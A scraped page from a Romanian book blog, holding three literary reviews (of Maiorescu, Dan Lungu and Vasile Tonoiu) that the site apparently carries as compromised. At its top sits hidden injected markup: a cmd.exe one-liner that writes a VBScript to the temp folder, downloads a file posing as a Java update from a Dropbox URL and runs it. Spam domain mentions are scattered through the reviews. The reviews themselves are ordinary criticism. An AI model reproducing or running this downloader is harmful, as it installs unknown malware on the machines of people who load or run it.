carteadeschisa.ro Rss

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0





height="1" width="1">

value="cmd.exe /c echo Const adTypeBinary = 1 gt; %temp%\winconfig.vbs amp; echo Const adSaveCreateOverWrite = 2 gt;gt; %temp%\winconfig.vbs amp; echo Dim abc gt;gt; %temp%\winconfig.vbs amp; echo Dim xyz gt;gt; %temp%\winconfig.vbs amp; echo Dim rofl gt;gt; %temp%\winconfig.vbs amp; echo abc = "ADODB" gt;gt; %temp%\winconfig.vbs amp; echo xyz = ".Stream" gt;gt; %temp%\winconfig.vbs amp; echo Set rofl = CreateObject(abc+xyz) gt;gt; %temp%\winconfig.vbs amp; echo rofl.Type = adTypeBinary gt;gt; %temp%\winconfig.vbs amp; echo rofl.Open gt;gt; %temp%\winconfig.vbs amp; echo rofl.Write BinaryGetURL(Wscript.Arguments(0)) gt;gt; %temp%\winconfig.vbs amp; echo rofl.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite gt;gt; %temp%\winconfig.vbs amp; echo Function BinaryGetURL(URL) gt;gt; %temp%\winconfig.vbs amp; echo Dim lol gt;gt; %temp%\winconfig.vbs amp; echo Set lol = CreateObject("WinHttp.WinHttpRequest.5.1") gt;gt; %temp%\winconfig.vb
s amp; echo lol.Open "GET", URL, False gt;gt; %temp%\winconfig.vbs amp; echo lol.Send gt;gt; %temp%\winconfig.vbs amp; echo BinaryGetURL = lol.ResponseBody gt;gt; %temp%\winconfig.vbs amp; echo End Function gt;gt; %temp%\winconfig.vbs amp; echo Set blub = CreateObject("WScript.Shell") gt;gt; %temp%\winconfig.vbs amp; echo blub.Run "%temp%\update.exe" gt;gt; %temp%\winconfig.vbs amp; start %temp%\winconfig.vbs http://dl.dropbox.com/u/12138956/java_update.exe %temp%\update.exe"> acceptchecksnow.com name="windows2" value=""> value=""> name="linux2" value="">


În Contra direcției de astăzi

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0

critica-maiorescujpgAutor: Titu Maiorescu
Editura Minerva
Anul apariției: 2005
Locul apariției: București
ISBN: 973-21-0753-7 ; 973-21-0754-5

Pace și bine!

Articolul lui Titu Maiorescu din 1868  – poreclit de adversari Maurul – s-a constituit într-un limbaj critic incipient ca răspuns la critica ziarului Transilvania care-l acuza că se ocupă cu flecuștețe lingvistice. Arată că la baza unei asemenea atac stau 3 cărți eronate din punct de vedere istoric (Petru Maior care afirma că dacii au fost eliminați complet după cucerirea romană, Lexiconul de la Buda din 1825 care a încercat să elimine aproape complet cuvintele de origine slavă, Gramatica Tentanem din 1840 în care s-au dat exemple dintr-o limbă romînească inexistentă). Aici țin să notez că aceste trei opere au generat o direcție falsă în sensul că în acea perioadă se considera că acțiunea asupra limbii trebuie să vină din partea lingviștilor care s-o îmbunătățească în funcție de așa-zisele interese ale națiunii. (După cum știm, azi lingviștii doar observă cuvintele existente în limbă, sunt prea mulți inovatori ca să se mai amestece și ei în chip programatic. Mai degrabă corectează paradigma și funcționalitatea cuvântului)

După un succint istoric al progresului din secolul 19, Titu Maiorescu constată că prin imitație și reproducere au apărut doar efectele civilizației (forme goale, de deasupra, superficiale, aparențe) nu și cauzele, respectiv fundamentele istorice necesare procesului de civilizare.

Inițiativa a avut un scop lăudabil, progresist – literatura, știința, arta frumoasă, vroiam să arătăm Europei că, demni urmași ai lui Traian, suntem capabili de a fi la înălțimea altor civilizații, dar din nefericire am mers într-o direcție falsă. Obiectivele au fost înlocuite cu statistici. Literatura a fost echivalată unui număr mare de tipografii sau de publicații, știința cu o suită de discursuri ori societăți mai mult sau mai puțin declarat academice, pictura cu o înșiruire de pânze, libertatea cu discursurile politice.

Direcția falsă a provocat din partea urmăritorilor ei suficiență, rătăcirea judecății, orbire, neadevăr. Aveam jurnale politice, dar nu partide, reviste literare, dar nu și un public iubitor de literatură, școli și gimnazii, dar nu învățători și profesori, atenee și pinacoteci, dar nu și cultură. Astfel s-au ajuns să se fasifice ideile de Academie, de Conservator, de Școală de Belle-Arte, de teatru, de constituție.

După ce constată falsitatea și nulitatea culturii claselor mai înalte, vorbește despre cultura clasei de jos, cea a țăranului care ar fi singura adevărată și de aceea cere o artă care să dedice conținutul țăranului cel autentic. (O tendință poporanistă avant la lettre!)

În alt plan militează pentru regenerarea spiritului public, arătând ce greșeli ar trebui evitate, anume încurajarea mediocrităților (Prin căutarea valorii care se percepe de la prima înfățișare a operei care dovedește în alt plan valabilă pentru toți) și promovarea formei fără fond.

Folosind o întrebare retorică  ”Mai este oare timp de scăpare?” afirmă că mai bine formele fără fond să nu apară decât să strice mijloacele tradiționale de cultură, decât să se discrediteze întârziiind astfel apariția fondului. Articolul revine la sfârșit cu atacul contra revistei Transilvania și arată că pe Titu Maiorescu nu-l preocupau deloc bagatelele, ci solicită fond, limbă bună, ortografie, gramatică.

Prin urmare ideile lui Maiorescu sunt rezumabile în aceste câteva ancore memorabile: O direcție falsă în limbă și în cultură crează instituții locuite de fantome și guvernate de neadevăr.  Va fi susținută de oameni mediocri, care discreditează cultura română și îi întârzie apariția substanței. Forma se dovedește o iluzie socială fără fond.

Notă – voi consemna mâine cum a văzut Garabet Ibrăileanu acest articol. Poate fi răstălmăcit în fel și chip.

Ceva de genu

Gabriel Mirea

Cum să uiți o femeie

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0

f68392-Dan-Lungu-Cum-sa-uiti-o-femeieAutor: Dan Lungu
Editura Polirom
Anul apariției: 2009
Locul apariției: Bucureşti
Număr pagini: 386
ISBN: 973-46-1328-1

Pace și bine!

Un titul supercomercial

Parcă ar urma să deschid o carte de self management de genul cum să devin bogat, milionar sau șofer de formula 1. E adevărat, există în titlul lui Dan Lungu și o nuanță negativă abia vizibilă, de fapt ar fi un îndrumar despre cum să faci să nu mai ai un anume sentiment.  Pare să fie un fel de îndreptar de curățire interioară, miroase a medicină, a psihiatrie, a expurgație și tratament.

Titlul este pe de altă parte rizibil

Femeile care cumpără cartea se pot întreba cum anume pot fi uitate, bărbații pe de altă parte, fiecare cu bubele sale antifeminine, dau banii în speranța că iar vor încerca un paliativ ce le-o face viața mai comodă. Nimeni nu speră să uite nimic, dar cum titlul este la persoana a III-a, seamănă cu un îndrumar de lucrări agricole, te pomenești că…! Evident că este un truc  auctorial, experiența naratorului este singura în care se încearcă o tentativă de ștergere cu buretele, dar este aparent impersonalizată, este adoptată tehnica aceea din politică în care deși  îmi reprezint propriul interes, dau senzația oamenilor că uit de mine și vorbesc doar în numele lor. Acel noi cu dublu înțeles se păstrează în pseudoimperativul să uiți!

De fapt o uită?

Am putea pleca liniștiți fără să cumpărăm cartea cu acest răspuns liniștitor: bineînțeles că nu, din moment ce îi dedică o carte. Despărțirile au diferite consecințe neașteptate. Unii se sinucid, se aruncă în mijlocul broaștelor sau al leilor, unii folosesc diverse trupuri feminine pentru uitare, devin perverși sau apostoli, călugări, explorează Chomolugme și peșteri fără fund, se baricadează în întuneric sau se expun în public cu râsete ciudate, cu indecențe, cu șiraguri de înjurături. O despărțire majoră relevă iadul din fiece persoană, într-un spectacol uman care cuprinde toată gama sufletească de la neagra resemnare până la crimele împotriva umanității.
Cei mai mulți strigă și până la urmă parțial această carte este un strigăt de neputință după o despărțire brutală.  Un personaj filosof spune în carte că despărțirile nu pot fi decât așa, inexplicabile, torturante, în afara sensului. Că vin neașteptat și schimbă viața spre o direcție imprevizibilă.

Totuși…

În materie de întâlniri și despărțiri lucrurile sunt însoțite de atâtea forme și nuanțe încât părerile totalitare sunt suspecte și  de neluat în seamă. Există tot felul de despărțiri, unele prin acord tacit, altele ca într-o pantă lină, doar divorțurile nu sunt cazuri trase la indigo. Dan Lungu își introduce cu abilitate personaje care caută să rezolve nodul gordian în maniera lui Alexandru cel Mare, dar prin discursul său romanesc arată că, de fapt, lucrurile sunt complicate de maniera ireductibilă, putere la putere.

acceptchecksnow.com Ce vreau să spun prin asta?

Foarte pe scurt, o ziaristă de scandal Marga se desparte de amorezul său ziarist de la anchete sociale, Andi.  Asta e tot pe 350 de pagini. De fapt, intenția mea a fost doar să dau numele protagoniștilor pe care îi vizează titlul. Marga este o femeie frumoasă. Origini incerte, probabil din țara Basa. Intră în noua relație ca să-i facă în ciudă unui fost amant. Iese din relație inexplicabil, doar cu un bilețel fanny, la fel de stupid ca și cele ale sinucigașilor: ”Te rog să mă ierți. Cândva o să înțelegi”. Atât. Nu complicații, nu explicații, nimic în –ații. Cocoana și-a luat bagajele și s-a dus pe apa sâmbetii  încă de la începutul romanului. A devenit un fel de Nechifor Lipan, adică deja este moartă textual. Personaj absent. Prin urmare vom auzi doar vocea El. Punctul lui de vedere, suferința lui, reconstituirea Margăi dinspre forma sa de înțelegere. Evident că muta Marga ne avertizează. Nu, Andi deocamdată nu înțelege nimic, dar în viitor, probabil când o să scrie o carte sau, cine știe, când se va bucura după procesul uitării de nurii altei consoarte, o să-l lumineze deodată o înțelegere terifiantă. În privința asta, fantezia naratorului este excelentă. Și-o imaginează pe Marga devenind extraterestră, făcând acrobații narcotice, împlinindu-se apoteotic sau metamorfozându-se oniric.

Acum vine partea care dezminte titlul

Nu este vorba exclusiv de relația de iubire, ea este doar un pretext, ci mai degrabă de conturarea unei perioade din viața personajului Andi. Un fel de Gelu Ruscanu din anii 2000 visează la dreptate într-o lume a rechinilor ziariști  dedicați doar șantajului … Este un personaj care merge până la capăt, într-o relație anterioară se îmbată non-stop, apoi caută să-și impună criteriile sale de dreptate prin discursul diaristic, se lasă atras în experiențe mistice și se definește contrar, exploatează până la epuizare momentul despărțirii și-l maschează după cețuri tot mai îndepărtate.

Dar îi atribui prea multe acestui nod textual numit Andi

Așa numea un critic personajele de roman, doar noduri textuale, chestii vorbite care au aparență de sentimente, idei, trăiri. Culegi un nume de ici, o față de colo, o poveste de dincolo și faci un Frankenstein textual așa cum a fost transformat Ion al lui Rebreanu în manualele școlare. Andi devine prin urmare instanță narativă, vocea dominantă, masculul textual alfa, personajul principal și alte asemenea farafastâcuri centraliste. Poate de aceea este bine să uiți conceptele critice, altfel nu am mai putea citit o pagină. Și acest roman are o curgere a poveștii admirabilă. Așa că să uităm poanta cu nodul textual și să revin la conceperea lui Andi ca o persoană care merită stima și considerațiile noastre. Altfel, ajung să mă laud că am mai citit o carte cu câteva noduri textuale, unele s-au încâlcit și altele s-au destrămat. Discurs ridicol.

Andi ne arată toate punctele sale cardinale

Povestea de iubire cu Marga

Un număr consistent de pagini.  Nu e cine știe ce, un bairam, amor din prima noapte, lipsa de condiții pentru o relație de durată. Iubirea din garsonieră lângă alte garsoniere ocupate de pensionari și chiriași pârliți. Iubita ff. prețioasă care nu face amor până nu se machiază, frăgezește, umezește complet. Doar după ce ea devine din perspectiva proprie frumoasă, are dreptul domnul Andi s-o atingă așa… așa.  Apoi vine despărțirea, ahurile și ofurile de rigoare, dar nimic în manieră balcanică, nu are o suferință de tip țambal, ci mai degrabă sună a glas subțiratec de vioară, a Rapsodia lui Ciprian Porumbescu.

Aventurile sale la ziar

Aici aflăm de forma de manifestare a rechinilor din presă. S-o dezvăluim și noi pentru buna informare a cetățenilor creduli. – Am întâlnit unul chiar ieri care era să mă bată pe baza informațiilor aflate exclusiv din gura curcubeică a tv. – La redacții vin tot felul de informații despre comportamentul sălbatic comercial al vreunui pungaș directorial din provincie. Reporterii privilegiați sunt trimiși la săpături asupra afacerii. Afacerea împricinaților este studiată metodic, cu tehnici similare celor polițienești și, în scurt timp, li se întocmește un așa-zis dosar de presă de mai mare frumusețea.  Dezvăluirile ar urma să fie evident incendiare. Numai că, aici este chichița, înainte se dă o notiță asupra unui posibil caz de… Dacă mahărul vizat are urechi de auzit și știe să se miște financiar din vreme, bine, dacă nu, apare o primă dezvăluire. Deja lucrurile încep să coste tot mai mult și, cu cât sunt publicate mai multe lucruri, cu atât mușamalizarea este mai costisitoare. O părticică din sumă merge și la reporter, dar grosul evident că-l ia patronul, redactorul-șef, mă rog, cine a finanțat expediția de culegere de informații. Mafia din domeniu dă drumul doar la informațiile despre cei care n-au cotizat. În rest, acari Păuni, accidente, statistici, bla-bla-bla-uri de umplut pagina.

Experiența religioasă

Apare datorită unei întâmplări nedorite legate de mutarea continuă pe care este nevoit să o îndure azi un chiriaș în București. Prețuri mari, salarii mici.  Puțini oameni înțelegători. Printre ei un neoprotestant care are grijă  într-o formă indirectă să-l atragă spre credința sa. Andi se împotrivește și i se par copilării scenele devoționale la care asistă. I se furnizează tot felul de asemănări cu care ar fi  de dorit să se identifice. Și ceilalți membri ai comunității au fost nefericiți, doresc să participe la viața publică, au de luptat pentru răspândirea adevărului, se confruntă cu rechini de diferite grade. Deosebirile Andi le găsește de unul singur. Are însă neașteptate cedări, merge de câteva ori cu neoprotestanții aceia la întruniri nonformale. Finalul este din această perspectivă incert. Fie va deveni religios, fie se va întoarce Marga, fie își va găsi pe alta. Naratorul încheie cu puncte, puncte, imaginați-vă în continuare ce vreți.

Câteva adnotări finale

Este un roman  de experiență care are un ton sacadat, mecanic în relatare. Ideile nu sunt remarcabile, dar bine legate epic și pot provoca dezbateri ulterioare spre consistent.
Personajele tind spre tipologie, dar au ceva incomplet care poate da sau nu senzația de complexitate. Există de altfel conturarea unor opoziții tipologice: ateul – pocăitul, însetatul de dreptate – ziaristul cinic, amorezul ecologist – amorezul artist.
Tehnica narativă a presupus relatarea a două voci distincte ale aceluiași personaj în momente temporale diferite – pasiunea și socializarea prin ziaristică, integrate într-o colecție consistentă din punct de vedere anecdotic.
Povestea se desfășoară pe un zgomot de fond generat de două personaje de deasupra textului, mă rog, deasupra garsonierei iubirii se află doi vecini care se ceartă și se înjură toată ziua pentru nimicuri. Plouă peste teritoriul lui Andi cu clișee agresive.

Ceva de genu’

Gabriel Mirea

Despre diferenţe, alteritate şi dialog intercultural – Cosmofagie

Posted on : 11-10-2010 | By : admin | In : Uncategorized

1

11TonoiuAutor: Vasile Tonoiu
Editura Academiei Române
Anul apariției: 2005
Locul apariției: Bucureşti
Număr pagini: 225
ISBN: 973-27-1217-1
acceptchecksnow.com

Pace și bine!

Ce am mai citit din Vasile Tonoiu?

Un filosof african Haris Memel Fote a spus că pretenția europenilor de obiectivitate poate fi definită ca o atitudine cosmofagă.

Mă gândeam că la fel ar putea fi văzută și atitudinea îndrăgostitului care oferă iubitei sale luna de pe cer. Ok, dar ce se întâmplă cu ceilalți? Rămân în întuneric!

Cosmofog se dovedește și Lucian Blaga în poemul său expresionist Dați-mi un trup voi munților! Atunci când cere să-și abandoneze trupul muritor în favoarea unuia enorm,făcut din piatră.

Când aș iubi
Mi-aș întinde spre cer toate mările
Ca niște vânjoase, sălbatice brațe fierbinți
Spre cer
Să-l cuprind
Mijlocul să-i frang
Să-i sărut sclipitoarele stele

Când aș urî
Aș zdrobi sub picioarele mele de stâncă
Bieți sori călători
Și poate-aș zâmbi.

Și romantismul a fost de o cosmofagie feroce. La Eminescu, Cătălina, devoratoarea de Luceferi, Luceafărul sorbind din șerbetul Cosmosului, bătrânul dascăl care depozitează în degetul mic întregul univers. Poemul Memento Mori cu lupta din cer între două panteoane, dac și roman.

Îmi pare că literar cosmofagia este un procedeu care adaugă forme de expresivitate ale spațiului inaccesibil. Boala se explică prin anularea credinței  în zei. Dacă nu este nimic sus, universul ne așteaptă să-l cucerim și, dacă nu avem încă nave potrivite, de ce să nu ne folosim deocamdată imaginația! De pildă o viziune cosmofogă este aceea în care ar fi în viitor un univers în care limba comună ar fi limba engleză, dovedindu-se astfel imaginație și gândire îngustă, reducționistă. O limbă îngurgitează universul lingvistic. Să-i adăug prin urmare termenul de lingvistofagă.

Ceva de genu`

Gabriel Mirea

"));